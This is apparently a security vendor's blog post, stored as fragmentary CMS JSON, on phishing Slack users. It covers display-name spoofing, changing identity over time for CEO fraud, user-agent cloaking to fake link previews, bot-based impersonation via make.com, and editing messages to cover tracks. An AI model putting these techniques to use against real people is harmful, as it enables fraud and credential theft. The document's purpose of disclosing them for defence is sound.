module",{"url":62641,"width":62642,"height":62643},"https://images.ctfassets.net/y1cdw1ablpvd/1uJzr0ucaJ8MLDNMahXMB1/0283901315071d91b82b99219f63636e/image2.png",730,911,{"sys":62645,"__typename":1724,"title":62646,"caption":62647,"layoutMode":59,"file":62648},{"id":62229},"Slack phishing 2: picking bot connection","Picking a Slack bot connection when making the Slack integration",{"url":62649,"width":62650,"height":62651},"https://images.ctfassets.net/y1cdw1ablpvd/6WqmwIk8FjPXOyxbxED5Qi/e87f8525c1de1f7c34d2a6c15114e80d/image3.png",488,335,{"sys":62653,"__typename":1724,"title":62654,"caption":62655,"layoutMode":59,"file":62656},{"id":62235},"Slack phishing 2: OAuth2 permission","Accepting the OAuth2 permissions request for the app. Make.com still uses an app called “Integromat”, a legacy name for the company",{"url":62657,"width":62658,"height":58435},"https://images.ctfassets.net/y1cdw1ablpvd/5HVlkZQTmdiPDqv7jJehmn/fb6ebc3d0fe078a7f15a86539559a4e7/image12.png",669,{"sys":62660,"__typename":1724,"title":62661,"caption":62662,"layoutMode":59,"file":62663},{"id":62268},"Slack phishing 2: make.com module","Setting the module to send a message to a public slack channel as the bot account",{"url":62664,"width":1802,"height":62665},"https://images.ctfassets.net/y1cdw1ablpvd/2RbQjzfLYcwWQx69z8itqT/45f8a0019ec4ba3bbebf8075611c9a0a/image7.png",644,{"sys":62667,"__typename":1724,"title":62668,"caption":62669,"layoutMode":59,"file":62670},{"id":62274},"Slack phishing 2: make.com bot","Configuring the bot to use a different name and photo in order to spoof the user",{"url":62671,"width":62650,"height":62672},"https://images.ctfassets.net/y1cdw1ablpvd/1XZquRG7yPnJUkbOUqaUQp/13047e61614ab9f66ee7aba89ad0ab1b/image6.png",368,{"sys":62674,"__typename":1724,"title":62675,"caption":62676,"layoutMode":59,"file":62677},{"id":62280},"Slack phishing 2: phishing message","The phishing message sent once the scenario is run, which is almost identical in appearance to what we saw previously except for “APP” after the name",{"url":62678,"width":62679,"height":62680},"https://images.ctfassets.net/y1cdw1ablpvd/5D2bon4DWhciGqyrjW1cfF/9b3aa5dbab536a60e1fdd4eeffa16038/image5.png",1060,662,{"sys":62682,"__typename":1724,"title":62683,"caption":62684,"layoutMode":59,"file":62685},{"id":62308},"Slack phishing 2: spoof message","Sending a spoofed message without the use of a bot token allows someone to click on the user and see the original email address",{"url":62686,"width":62687,"height":62688},"https://images.ctfassets.net/y1cdw1ablpvd/JA1ilU37q6o9dd66fPo0N/656f1e35cdbf044d5d244c703735fdac/image8.png",389,664,{"sys":62690,"__typename":1724,"title":62691,"caption":62692,"layoutMode":59,"file":62693},{"id":62314},"Slack phishing 2: spoof message with bot token","Sending a spoofed message using a bot token from make.com takes the user to the Integromat app if they click on the user, so they can’t easily see who was responsible",{"url":62694,"width":62695,"height":32872},"https://images.ctfassets.net/y1cdw1ablpvd/1WLBeP00qfcJA57SU50jhO/a925300ed74c4160df3d2c8333b9601b/image10.png",1250,{"sys":62697,"__typename":1724,"title":62698,"caption":62699,"layoutMode":59,"file":62700},{"id":62355},"Slack phishing 2: monitor for keywords","Creating a scenario to monitor public channel messages for certain keywords in order to reply with phishing messages",{"url":62701,"width":62702,"height":62703},"https://images.ctfassets.net/y1cdw1ablpvd/1vnotvKHH2WlPkaAdgnBfd/a2b62d3b74ba4dcce0ac358a53a1d563/image11.png",1260,909,{"sys":62705,"__typename":1724,"title":62706,"caption":62707,"layoutMode":59,"file":62708},{"id":62387},"Slack phishing 2: make.com response","Our make.com scenario automatically responding in a thread with a targeted phishing link from a spoofed bot user, using a spoofed link preview",{"url":62709,"width":1736,"height":62710},"https://images.ctfassets.net/y1cdw1ablpvd/4djCgzAgzmqZ6o0efkEAaW/40b304ed2373d6fec9e54a16a1ca5bad/image4.png",771,{"sys":62712,"__typename":1724,"title":62713,"caption":59,"layoutMode":59,"file":62714},{"id":62400},"Slack IT bot phishing automation demo",{"url":62715,"width":8977,"height":30057},"https://images.ctfassets.net/y1cdw1ablpvd/2DAJiJLPZ48TRTl9HVfgP4/7e1383ae8f46ae4122c75dd30c6dce6b/slack-it-bot-phishing-auotmation-demo-trimmed.webp",{"sys":62717,"__typename":1724,"title":62718,"caption":62719,"layoutMode":59,"file":62720},{"id":62413},"Slack phishing 2: technical diagram","Diagram showing the connections between the attacker, compromised Slack account and make.com",{"url":62721,"width":1736,"height":1737},"https://images.ctfassets.net/y1cdw1ablpvd/3y1xzUl7WslwtWeK7xaUMU/0162c7c512d7e054f06b73b2ff22726e/image1.png",{"sys":62723,"__typename":1724,"title":62724,"caption":62725,"layoutMode":59,"file":62726},{"id":62447},"Slack phishing 2: multi-party spoofing","Multi-party spoofing of messages for advanced social engineering internally on Slack",{"url":62727,"width":62728,"height":62729},"https://images.ctfassets.net/y1cdw1ablpvd/6RSsQoqyciS8xxEmqNAZgf/ab12b5c1777fbc574c079ca9d7ea3532/image9.png",538,214,{"sys":62731,"__typename":1717,"type":58474,"ctaText":58475,"buttonLabel":58476,"buttonColour":56131,"buttonUrl":59},{"id":58370},{"items":62733},[],{},"Phishing Slack for persistence and lateral movement","2023-10-24T00:00:00.000Z",{"items":62738},[62739,63472,64243],{"__typename":2059,"sys":62740,"content":62741,"title":58384,"synopsis":63461,"hashTags":59,"publishedDate":62736,"slug":58385,"tagsCollection":63462,"authorsCollection":63468},{"id":57693},{"json":62742},{"data":62743,"content":62744,"nodeType":856},{},[62745,62775,62782,62823,62830,62849,62855,62861,62867,62873,62879,62909,62915,62951,62957,62962,62968,62974,62980,62986,62993,62999,63006,63013,63020,63027,63033,63040,63047,63054,63061,63068,63074,63080,63087,63093,63113,63119,63125,63132,63139,63145,63151,63158,63164,63171,63178,63185,63191,63198,63204,63211,63218,63226,63238,63244,63251,63257,63263,63269,63276,63283,63290,63297,63304,63310,63317,63323,63330,63336,63343,63349,63355,63361,63400,63406,63412,63418,63425,63431,63450,63455],{"data":62746,"content":62747,"nodeType":860},{},[62748,62752,62759,62762,62772],{"data":62749,"marks":62750,"value":62751,"nodeType":864},{},[],"This is the third post in a series on attack chains formed by combining techniques in the ",{"data":62753,"content":62754,"nodeType":883},{"uri":6418},[62755],{"data":62756,"marks":62757,"value":5765,"nodeType":864},{},[62758],{"type":1455},{"data":62760,"marks":62761,"value":60898,"nodeType":864},{},[],{"data":62763,"content":62766,"nodeType":57700},{"target":62764},{"sys":62765},{"id":60862,"type":1001,"linkType":1002},[62767],{"data":62768,"marks":62769,"value":62771,"nodeType":864},{},[62770],{"type":1455},"shadow workflows and evil twin integrations.",{"data":62773,"marks":62774,"value":21,"nodeType":864},{},[],{"data":62776,"content":62777,"nodeType":860},{},[62778],{"data":62779,"marks":62780,"value":62781,"nodeType":864},{},[],"In this article, we’ll demonstrate how instant messaging applications are an increasingly attractive target for a range of phishing and social engineering attacks. We’ll use the following SaaS attack techniques chained together:",{"data":62783,"content":62784,"nodeType":941},{},[62785,62804],{"data":62786,"content":62787,"nodeType":945},{},[62788],{"data":62789,"content":62790,"nodeType":860},{},[62791,62794,62801],{"data":62792,"marks":62793,"value":21,"nodeType":864},{},[],{"data":62795,"content":62796,"nodeType":883},{"uri":57755},[62797],{"data":62798,"marks":62799,"value":57760,"nodeType":864},{},[62800],{"type":1455},{"data":62802,"marks":62803,"value":21,"nodeType":864},{},[],{"data":62805,"content":62806,"nodeType":945},{},[62807],{"data":62808,"content":62809,"nodeType":860},{},[62810,62813,62820],{"data":62811,"marks":62812,"value":21,"nodeType":864},{},[],{"data":62814,"content":62815,"nodeType":883},{"uri":57775},[62816],{"data":62817,"marks":62818,"value":57780,"nodeType":864},{},[62819],{"type":1455},{"data":62821,"marks":62822,"value":21,"nodeType":864},{},[],{"data":62824,"content":62825,"nodeType":860},{},[62826],{"data":62827,"marks":62828,"value":62829,"nodeType":864},{},[],"We’ll use Slack as our primary example in this case and we’ll be primarily focused on external phishing as part of the initial access phase of the kill chain. ",{"data":62831,"content":62832,"nodeType":860},{},[62833,62836,62845],{"data":62834,"marks":62835,"value":62086,"nodeType":864},{},[],{"data":62837,"content":62840,"nodeType":57700},{"target":62838},{"sys":62839},{"id":57717,"type":1001,"linkType":1002},[62841],{"data":62842,"marks":62843,"value":62844,"nodeType":864},{},[],"companion article",{"data":62846,"marks":62847,"value":62848,"nodeType":864},{},[],", we’ll look at how once an attacker has a foothold on Slack, new attack possibilities open up that allow for persistence and lateral movement to be achieved.",{"data":62850,"content":62851,"nodeType":1009},{},[62852],{"data":62853,"marks":62854,"value":57790,"nodeType":864},{},[],{"data":62856,"content":62857,"nodeType":860},{},[62858],{"data":62859,"marks":62860,"value":57805,"nodeType":864},{},[],{"data":62862,"content":62863,"nodeType":860},{},[62864],{"data":62865,"marks":62866,"value":57812,"nodeType":864},{},[],{"data":62868,"content":62869,"nodeType":860},{},[62870],{"data":62871,"marks":62872,"value":57819,"nodeType":864},{},[],{"data":62874,"content":62875,"nodeType":860},{},[62876],{"data":62877,"marks":62878,"value":57826,"nodeType":864},{},[],{"data":62880,"content":62881,"nodeType":941},{},[62882,62891,62900],{"data":62883,"content":62884,"nodeType":945},{},[62885],{"data":62886,"content":62887,"nodeType":860},{},[62888],{"data":62889,"marks":62890,"value":57839,"nodeType":864},{},[],{"data":62892,"content":62893,"nodeType":945},{},[62894],{"data":62895,"content":62896,"nodeType":860},{},[62897],{"data":62898,"marks":62899,"value":57849,"nodeType":864},{},[],{"data":62901,"content":62902,"nodeType":945},{},[62903],{"data":62904,"content":62905,"nodeType":860},{},[62906],{"data":62907,"marks":62908,"value":57859,"nodeType":864},{},[],{"data":62910,"content":62911,"nodeType":860},{},[62912],{"data":62913,"marks":62914,"value":57866,"nodeType":864},{},[],{"data":62916,"content":62917,"nodeType":860},{},[62918,62921,62928,62931,62938,62941,62948],{"data":62919,"marks":62920,"value":57873,"nodeType":864},{},[],{"data":62922,"content":62923,"nodeType":883},{"uri":57876},[62924],{"data":62925,"marks":62926,"value":57882,"nodeType":864},{},[62927],{"type":1455},{"data":62929,"marks":62930,"value":57886,"nodeType":864},{},[],{"data":62932,"content":62933,"nodeType":883},{"uri":57889},[62934],{"data":62935,"marks":62936,"value":57895,"nodeType":864},{},[62937],{"type":1455},{"data":62939,"marks":62940,"value":57899,"nodeType":864},{},[],{"data":62942,"content":62943,"nodeType":883},{"uri":57902},[62944],{"data":62945,"marks":62946,"value":57908,"nodeType":864},{},[62947],{"type":1455},{"data":62949,"marks":62950,"value":2924,"nodeType":864},{},[],{"data":62952,"content":62953,"nodeType":860},{},[62954],{"data":62955,"marks":62956,"value":62067,"nodeType":864},{},[],{"data":62958,"content":62961,"nodeType":996},{"target":62959},{"sys":62960},{"id":57916,"type":1001,"linkType":1002},[],{"data":62963,"content":62964,"nodeType":1009},{},[62965],{"data":62966,"marks":62967,"value":57924,"nodeType":864},{},[],{"data":62969,"content":62970,"nodeType":860},{},[62971],{"data":62972,"marks":62973,"value":57931,"nodeType":864},{},[],{"data":62975,"content":62976,"nodeType":860},{},[62977],{"data":62978,"marks":62979,"value":57938,"nodeType":864},{},[],{"data":62981,"content":62982,"nodeType":1312},{},[62983],{"data":62984,"marks":62985,"value":57945,"nodeType":864},{},[],{"data":62987,"content":62988,"nodeType":860},{},[62989],{"data":62990,"marks":62991,"value":62992,"nodeType":864},{},[],"IM applications often make use of friendly display names for organization and employee names as well as user-chosen handles. These often don’t need to be unique either. Consider the following Slack Connect request:",{"data":62994,"content":62998,"nodeType":996},{"target":62995},{"sys":62996},{"id":62997,"type":1001,"linkType":1002},"7MEljb1f6XzNRBEbOSsQXi",[],{"data":63000,"content":63001,"nodeType":860},{},[63002],{"data":63003,"marks":63004,"value":63005,"nodeType":864},{},[],"It’s not easy for a target user to tell if the user or organization requesting to connect is legitimate when they first receive this invitation. There’s also a curiosity incentive - you can’t see a first message from the user, so it’s tempting for the target user to accept in order to see the message, even if they then ignore it.",{"data":63007,"content":63008,"nodeType":860},{},[63009],{"data":63010,"marks":63011,"value":63012,"nodeType":864},{},[],"However, once an attacker has got a first connection, they have cleared the first hurdle. They can now launch attacks in future, not just attacks immediately following a successful connection, after the target user has forgotten they ever connected with the attacker (more on this later).",{"data":63014,"content":63015,"nodeType":1312},{},[63016],{"data":63017,"marks":63018,"value":63019,"nodeType":864},{},[],"Spoofing an internal user",{"data":63021,"content":63022,"nodeType":860},{},[63023],{"data":63024,"marks":63025,"value":63026,"nodeType":864},{},[],"What’s more, there’s nothing stopping an external attacker from impersonating internal users/employees too. This is especially a concern if an attacker can social engineer their way into being invited into a channel.",{"data":63028,"content":63032,"nodeType":996},{"target":63029},{"sys":63030},{"id":63031,"type":1001,"linkType":1002},"5TaP25v80xMkA5e33yFIfX",[],{"data":63034,"content":63035,"nodeType":860},{},[63036],{"data":63037,"marks":63038,"value":63039,"nodeType":864},{},[],"While this particular example is less likely to be successful in a small channel, it’s much more of a concern if they change their user identity to replicate an internal employee or teammate and then direct message a member of the channel. DMing an individual channel member doesn’t require a new Slack connect invite so it’s much easier for an unsuspecting target to fall victim to social engineering in this way. ",{"data":63041,"content":63042,"nodeType":1312},{},[63043],{"data":63044,"marks":63045,"value":63046,"nodeType":864},{},[],"Chameleon attack",{"data":63048,"content":63049,"nodeType":860},{},[63050],{"data":63051,"marks":63052,"value":63053,"nodeType":864},{},[],"A particularly interesting external attack capability is that an attacker can act as a chameleon and change their identity over time. Let’s say an external attacker achieves a successful connection with a potential target as an external entity. Maybe they exchange some innocuous communications and then leave the conversation to die. Perhaps the target even has Slack message retention settings enabled that delete the chat history after 90 days.",{"data":63055,"content":63056,"nodeType":860},{},[63057],{"data":63058,"marks":63059,"value":63060,"nodeType":864},{},[],"The attacker bides their time and then in the future, they completely change their Slack identity to impersonate an internal user and message the target again. The connection is already present so the message will come through like any other message, only this time it will appear from a completely different identity. It’s quite possible that the target could be fooled into believing the message is from the internal user. ",{"data":63062,"content":63063,"nodeType":860},{},[63064],{"data":63065,"marks":63066,"value":63067,"nodeType":864},{},[],"This could be particularly dangerous in CEO fraud attacks. An attacker could forge connections with finance employees ahead of time for seemingly legitimate and innocuous means and then later use those to send Slack messages spoofing the CEO.",{"data":63069,"content":63073,"nodeType":996},{"target":63070},{"sys":63071},{"id":63072,"type":1001,"linkType":1002},"51TYXiOwQw0D6BYCzu0em4",[],{"data":63075,"content":63079,"nodeType":996},{"target":63076},{"sys":63077},{"id":63078,"type":1001,"linkType":1002},"6ZQ6iFu11NnXOP4EMAgxji",[],{"data":63081,"content":63082,"nodeType":860},{},[63083],{"data":63084,"marks":63085,"value":63086,"nodeType":864},{},[],"All the examples given so far are possible as an external attacker making Slack connect invites, so they work as the initial access phase of the kill chain. However, if an attacker gains control of an internal Slack user account for the target tenant, or the attacker is a malicious insider (e.g. a disgruntled employee), then they don’t even need to worry about achieving an initial connection request. Under a default configuration, they could change their name and photo to impersonate the CEO immediately and message anyone they like. However, this is moving into the lateral movement phase of the kill chain.",{"data":63088,"content":63089,"nodeType":1009},{},[63090],{"data":63091,"marks":63092,"value":58040,"nodeType":864},{},[],{"data":63094,"content":63095,"nodeType":860},{},[63096,63099,63103,63106,63110],{"data":63097,"marks":63098,"value":58047,"nodeType":864},{},[],{"data":63100,"marks":63101,"value":58052,"nodeType":864},{},[63102],{"type":1455},{"data":63104,"marks":63105,"value":58056,"nodeType":864},{},[],{"data":63107,"marks":63108,"value":58061,"nodeType":864},{},[63109],{"type":1455},{"data":63111,"marks":63112,"value":58065,"nodeType":864},{},[],{"data":63114,"content":63115,"nodeType":860},{},[63116],{"data":63117,"marks":63118,"value":58072,"nodeType":864},{},[],{"data":63120,"content":63121,"nodeType":1312},{},[63122],{"data":63123,"marks":63124,"value":58079,"nodeType":864},{},[],{"data":63126,"content":63127,"nodeType":860},{},[63128],{"data":63129,"marks":63130,"value":63131,"nodeType":864},{},[],"We’ll start with a common traditional link forging scenario to see how Slack handles that, then show how link previews change the threat.",{"data":63133,"content":63134,"nodeType":860},{},[63135],{"data":63136,"marks":63137,"value":63138,"nodeType":864},{},[],"Here, we can see forging a link is permitted by Slack, but at least the real domain is shown to the user along with an overt warning.",{"data":63140,"content":63144,"nodeType":996},{"target":63141},{"sys":63142},{"id":63143,"type":1001,"linkType":1002},"3SDhqamQqXLfFqD8W1b37V",[],{"data":63146,"content":63150,"nodeType":996},{"target":63147},{"sys":63148},{"id":63149,"type":1001,"linkType":1002},"5yfDUdZ4F6zrp7AGnMGD5b",[],{"data":63152,"content":63153,"nodeType":860},{},[63154],{"data":63155,"marks":63156,"value":63157,"nodeType":864},{},[],"On the other hand, if we use friendly text to mask the true URL, we no longer get a warning when clicking the link. However, it’s still possible to see the real URL via a mouseover, so this doesn’t really differ from traditional email phishing scenarios. Without any context of the link, it’s likely a security conscious user will hover-over to see what the link points to.",{"data":63159,"content":63163,"nodeType":996},{"target":63160},{"sys":63161},{"id":63162,"type":1001,"linkType":1002},"3KCRJ9HIJimLX9vzJVHq1C",[],{"data":63165,"content":63166,"nodeType":1312},{},[63167],{"data":63168,"marks":63169,"value":63170,"nodeType":864},{},[],"Abusing link previews using an internal account ",{"data":63172,"content":63173,"nodeType":860},{},[63174],{"data":63175,"marks":63176,"value":63177,"nodeType":864},{},[],"It gets more interesting when we use links that Slack is able to unfurl to provide a link preview. We’re going to show how this works with full link previews first. By default, full previews only show for messages from internal users. To make the explanation easier, we’ll show full previews first but then we’ll show the difference with limited previews in external messages afterwards and thus show how it impacts external phishing attacks in the initial access phase.",{"data":63179,"content":63180,"nodeType":860},{},[63181],{"data":63182,"marks":63183,"value":63184,"nodeType":864},{},[],"Here we’ll show a legitimate example of posting one of our own blogs where Slack helpfully unfurls the URL and gives some context to the link as a preview:",{"data":63186,"content":63190,"nodeType":996},{"target":63187},{"sys":63188},{"id":63189,"type":1001,"linkType":1002},"7nknMRtdXGlupYom31kKor",[],{"data":63192,"content":63193,"nodeType":860},{},[63194],{"data":63195,"marks":63196,"value":63197,"nodeType":864},{},[],"This is very useful for the user and, despite the fact you can still see the real link clearly via a hover-over, a user is much less likely to check a link when they’ve already had a seemingly legitimate preview context displayed to them. ",{"data":63199,"content":63200,"nodeType":860},{},[63201],{"data":63202,"marks":63203,"value":58147,"nodeType":864},{},[],{"data":63205,"content":63206,"nodeType":860},{},[63207],{"data":63208,"marks":63209,"value":63210,"nodeType":864},{},[],"The obvious attack scenario is to minimize the link display text so it’s not noticeable and hard to hover-over and then forge a different link preview for Slack than what is given to the user when they click the link. Then when the user clicks the link, they’ll be directed to our phishing page instead. ",{"data":63212,"content":63213,"nodeType":860},{},[63214],{"data":63215,"marks":63216,"value":63217,"nodeType":864},{},[],"We can do this through using a single character as the link display text and then performing user agent specific processing of web requests. For example, Slack unfurling uses a user agent like the following:",{"data":63219,"content":63220,"nodeType":860},{},[63221],{"data":63222,"marks":63223,"value":63225,"nodeType":864},{},[63224],{"type":10610},"Slackbot-LinkExpanding 1.0 (+https://api.slack.com/robots)",{"data":63227,"content":63228,"nodeType":860},{},[63229,63233],{"data":63230,"marks":63231,"value":63232,"nodeType":864},{},[],"Therefore, without even requiring much sophistication, we can use some simple python code to perform a redirect to a legitimate source when our web request handler sees this user agent. However, when a target user visits using a normal web browser we instead return a malicious page. The example python code below redirects to benign content for a Slack preview, while serving malicious content otherwise:",{"data":63234,"marks":63235,"value":63237,"nodeType":864},{},[63236],{"type":899},"    ",{"data":63239,"content":63243,"nodeType":996},{"target":63240},{"sys":63241},{"id":63242,"type":1001,"linkType":1002},"4VHFyInQfa3tdvJO4rnnQL",[],{"data":63245,"content":63246,"nodeType":860},{},[63247],{"data":63248,"marks":63249,"value":63250,"nodeType":864},{},[],"The end result of this is that the user sees a nice friendly link preview legitimately produced by Slack and Google Docs in real time, whereas if they click the link they’ll be taken to our phishing page instead. ",{"data":63252,"content":63253,"nodeType":860},{},[63254],{"data":63255,"marks":63256,"value":58215,"nodeType":864},{},[],{"data":63258,"content":63262,"nodeType":996},{"target":63259},{"sys":63260},{"id":63261,"type":1001,"linkType":1002},"3QaFhW1otbJpzMI9ff5R4F",[],{"data":63264,"content":63268,"nodeType":996},{"target":63265},{"sys":63266},{"id":63267,"type":1001,"linkType":1002},"6ZFu92OSmI7miSGz8QwwtV",[],{"data":63270,"content":63271,"nodeType":860},{},[63272],{"data":63273,"marks":63274,"value":63275,"nodeType":864},{},[],"Using a small period as the display text for the hyperlink means it is difficult for the user to notice and hover-over to see Slack pop-up the true domain as we saw earlier. While they can still hover over the link preview itself, this only shows the real domain in the taskbar in the bottom left, which is only noticeable if you intentionally look for it. ",{"data":63277,"content":63278,"nodeType":860},{},[63279],{"data":63280,"marks":63281,"value":63282,"nodeType":864},{},[],"Given normal links in Slack show the domain above the mouse, users aren’t used to looking for the link here and, combined with the friendly link preview, it’s much less likely a target user will realize this is a phishing attack.",{"data":63284,"content":63285,"nodeType":1312},{},[63286],{"data":63287,"marks":63288,"value":63289,"nodeType":864},{},[],"Abusing link previews with an external account ",{"data":63291,"content":63292,"nodeType":860},{},[63293],{"data":63294,"marks":63295,"value":63296,"nodeType":864},{},[],"What we’ve just shown is the behavior for a message from an internal user. Slack doesn’t fully unfurl a link by default, however, if this was combined with external messaging as we saw earlier. It does still show a partial link preview though and therefore this attack is still possible.",{"data":63298,"content":63299,"nodeType":860},{},[63300],{"data":63301,"marks":63302,"value":63303,"nodeType":864},{},[],"The only real difference is it doesn’t show the image part of the preview and, instead, shows a notice to the user that it’s external and gives them the option to click to show the image preview as well. If the user clicks to show the image preview, it converts to the same full preview with the image we saw above. In this case, we can see an example of chaining the original external user spoofing attack with a link preview spoofing attack below:",{"data":63305,"content":63309,"nodeType":996},{"target":63306},{"sys":63307},{"id":63308,"type":1001,"linkType":1002},"4IkX0LI0bB36CxNlHYHRHs",[],{"data":63311,"content":63312,"nodeType":860},{},[63313],{"data":63314,"marks":63315,"value":63316,"nodeType":864},{},[],"While this is slightly more problematic for an attacker than the internal functionality for link previews, it’s still very useful as a social engineering technique and arguably the option to click “just show this one” adds to the legitimacy. The reason is the user may use this as a way to get context on what the link is, instead of looking for the underlying URL. Otherwise, clicking the link still takes the user to the phishing page without any other warnings the same as for internal messages.",{"data":63318,"content":63322,"nodeType":996},{"target":63319},{"sys":63320},{"id":63321,"type":1001,"linkType":1002},"2ug8ozbhRM3Xg8nhasJ1er",[],{"data":63324,"content":63325,"nodeType":1312},{},[63326],{"data":63327,"marks":63328,"value":63329,"nodeType":864},{},[],"Cleaning your tracks",{"data":63331,"content":63332,"nodeType":860},{},[63333],{"data":63334,"marks":63335,"value":58261,"nodeType":864},{},[],{"data":63337,"content":63338,"nodeType":860},{},[63339],{"data":63340,"marks":63341,"value":63342,"nodeType":864},{},[],"As an attacker, I could make a tiny change to my message to replace the malicious link with the legitimate link I was spoofing for the link preview if I got the sense the target was getting suspicious. Then, if an incident responder comes to investigate, the malicious link is now gone and the message itself appears identical, covering my tracks. Other than being able to see the message has been edited, it’s no longer easy to see this was a phishing attack or where the phishing link pointed to. This is definitely a useful capability that isn’t usually possible with email phishing! \n\nSee this minor change reflected below, making the original phishing message appear innocuous due to the replacement of the phishing URL with a legitimate URL:",{"data":63344,"content":63348,"nodeType":996},{"target":63345},{"sys":63346},{"id":63347,"type":1001,"linkType":1002},"32lWR3sObuIYvhSDUPIPAh",[],{"data":63350,"content":63351,"nodeType":1009},{},[63352],{"data":63353,"marks":63354,"value":58288,"nodeType":864},{},[],{"data":63356,"content":63357,"nodeType":860},{},[63358],{"data":63359,"marks":63360,"value":58295,"nodeType":864},{},[],{"data":63362,"content":63363,"nodeType":941},{},[63364,63373,63382,63391],{"data":63365,"content":63366,"nodeType":945},{},[63367],{"data":63368,"content":63369,"nodeType":860},{},[63370],{"data":63371,"marks":63372,"value":62493,"nodeType":864},{},[],{"data":63374,"content":63375,"nodeType":945},{},[63376],{"data":63377,"content":63378,"nodeType":860},{},[63379],{"data":63380,"marks":63381,"value":58318,"nodeType":864},{},[],{"data":63383,"content":63384,"nodeType":945},{},[63385],{"data":63386,"content":63387,"nodeType":860},{},[63388],{"data":63389,"marks":63390,"value":58328,"nodeType":864},{},[],{"data":63392,"content":63393,"nodeType":945},{},[63394],{"data":63395,"content":63396,"nodeType":860},{},[63397],{"data":63398,"marks":63399,"value":62521,"nodeType":864},{},[],{"data":63401,"content":63402,"nodeType":1009},{},[63403],{"data":63404,"marks":63405,"value":24968,"nodeType":864},{},[],{"data":63407,"content":63408,"nodeType":860},{},[63409],{"data":63410,"marks":63411,"value":58351,"nodeType":864},{},[],{"data":63413,"content":63414,"nodeType":860},{},[63415],{"data":63416,"marks":63417,"value":58358,"nodeType":864},{},[],{"data":63419,"content":63420,"nodeType":860},{},[63421],{"data":63422,"marks":63423,"value":63424,"nodeType":864},{},[],"In this article, we highlighted a number of spoofing and phishing strategies that can be employed by external attackers to target an organization using Slack in the initial access phase of the kill chain. In the next article, we’ll look at how once an attacker has a foothold on Slack, new attack possibilities open up that allow for persistence and lateral movement to be achieved.",{"data":63426,"content":63427,"nodeType":860},{},[63428],{"data":63429,"marks":63430,"value":62620,"nodeType":864},{},[],{"data":63432,"content":63433,"nodeType":860},{},[63434,63438,63446],{"data":63435,"marks":63436,"value":63437,"nodeType":864},{},[],"In our ",{"data":63439,"content":63442,"nodeType":57700},{"target":63440},{"sys":63441},{"id":57717,"type":1001,"linkType":1002},[63443],{"data":63444,"marks":63445,"value":62844,"nodeType":864},{},[],{"data":63447,"marks":63448,"value":63449,"nodeType":864},{},[],", we’ll talk about how to use Slack to gain persistence and move laterally across the organization. ",{"data":63451,"content":63454,"nodeType":996},{"target":63452},{"sys":63453},{"id":58370,"type":1001,"linkType":1002},[],{"data":63456,"content":63457,"nodeType":860},{},[63458],{"data":63459,"marks":63460,"value":21,"nodeType":864},{},[],"In this article, we’ll demonstrate how IM apps, specifically Slack, are an increasingly attractive target for a range of phishing & social engineering attacks.",{"items":63463},[63464,63466],{"sys":63465,"name":6593},{"id":6592},{"sys":63467,"name":297},{"id":2732},{"items":63469},[63470],{"fullName":4949,"firstName":4950,"jobTitle":4951,"profilePicture":63471},{"url":4955},{"__typename":2059,"sys":63473,"content":63474,"title":61741,"synopsis":60873,"hashTags":59,"publishedDate":61742,"slug":61743,"tagsCollection":64233,"authorsCollection":64239},{"id":60862},{"json":63475},{"data":63476,"content":63477,"nodeType":856},{},[63478,63484,63490,63518,63524,63530,63546,63552,63558,63564,63588,63594,63600,63613,63619,63625,63655,63661,63667,63673,63679,63685,63690,63696,63702,63708,63715,63721,63737,63743,63749,63755,63761,63767,63773,63779,63785,63791,63796,63802,63818,63824,63840,63845,63850,63855,63861,63867,63873,63878,63883,63889,63895,63901,63907,63913,63918,63934,63950,63956,63961,63966,63972,63978,63984,63990,64011,64016,64021,64027,64033,64039,64049,64054,64060,64065,64070,64076,64082,64088,64093,64098,64104,64110,64215,64221,64227],{"data":63479,"content":63480,"nodeType":860},{},[63481],{"data":63482,"marks":63483,"value":60873,"nodeType":864},{},[],{"data":63485,"content":63486,"nodeType":860},{},[63487],{"data":63488,"marks":63489,"value":60880,"nodeType":864},{},[],{"data":63491,"content":63492,"nodeType":860},{},[63493,63496,63503,63506,63515],{"data":63494,"marks":63495,"value":60887,"nodeType":864},{},[],{"data":63497,"content":63498,"nodeType":883},{"uri":6418},[63499],{"data":63500,"marks":63501,"value":5765,"nodeType":864},{},[63502],{"type":1455},{"data":63504,"marks":63505,"value":60898,"nodeType":864},{},[],{"data":63507,"content":63510,"nodeType":57700},{"target":63508},{"sys":63509},{"id":58881,"type":1001,"linkType":1002},[63511],{"data":63512,"marks":63513,"value":5236,"nodeType":864},{},[63514],{"type":1455},{"data":63516,"marks":63517,"value":10094,"nodeType":864},{},[],{"data":63519,"content":63520,"nodeType":860},{},[63521],{"data":63522,"marks":63523,"value":60917,"nodeType":864},{},[],{"data":63525,"content":63526,"nodeType":1009},{},[63527],{"data":63528,"marks":63529,"value":60924,"nodeType":864},{},[],{"data":63531,"content":63532,"nodeType":860},{},[63533,63536,63543],{"data":63534,"marks":63535,"value":60931,"nodeType":864},{},[],{"data":63537,"content":63538,"nodeType":883},{"uri":59957},[63539],{"data":63540,"marks":63541,"value":60939,"nodeType":864},{},[63542],{"type":1455},{"data":63544,"marks":63545,"value":60943,"nodeType":864},{},[],{"data":63547,"content":63548,"nodeType":860},{},[63549],{"data":63550,"marks":63551,"value":60950,"nodeType":864},{},[],{"data":63553,"content":63554,"nodeType":1009},{},[63555],{"data":63556,"marks":63557,"value":60957,"nodeType":864},{},[],{"data":63559,"content":63560,"nodeType":860},{},[63561],{"data":63562,"marks":63563,"value":60964,"nodeType":864},{},[],{"data":63565,"content":63566,"nodeType":860},{},[63567,63570,63577,63580,63585],{"data":63568,"marks":63569,"value":60971,"nodeType":864},{},[],{"data":63571,"content":63572,"nodeType":883},{"uri":39722},[63573],{"data":63574,"marks":63575,"value":60979,"nodeType":864},{},[63576],{"type":1455},{"data":63578,"marks":63579,"value":60983,"nodeType":864},{},[],{"data":63581,"marks":63582,"value":60989,"nodeType":864},{},[63583,63584],{"type":2246},{"type":899},{"data":63586,"marks":63587,"value":60993,"nodeType":864},{},[],{"data":63589,"content":63590,"nodeType":1009},{},[63591],{"data":63592,"marks":63593,"value":60484,"nodeType":864},{},[],{"data":63595,"content":63596,"nodeType":860},{},[63597],{"data":63598,"marks":63599,"value":61006,"nodeType":864},{},[],{"data":63601,"content":63602,"nodeType":860},{},[63603,63606,63610],{"data":63604,"marks":63605,"value":61013,"nodeType":864},{},[],{"data":63607,"marks":63608,"value":61018,"nodeType":864},{},[63609],{"type":1455},{"data":63611,"marks":63612,"value":61022,"nodeType":864},{},[],{"data":63614,"content":63615,"nodeType":860},{},[63616],{"data":63617,"marks":63618,"value":61029,"nodeT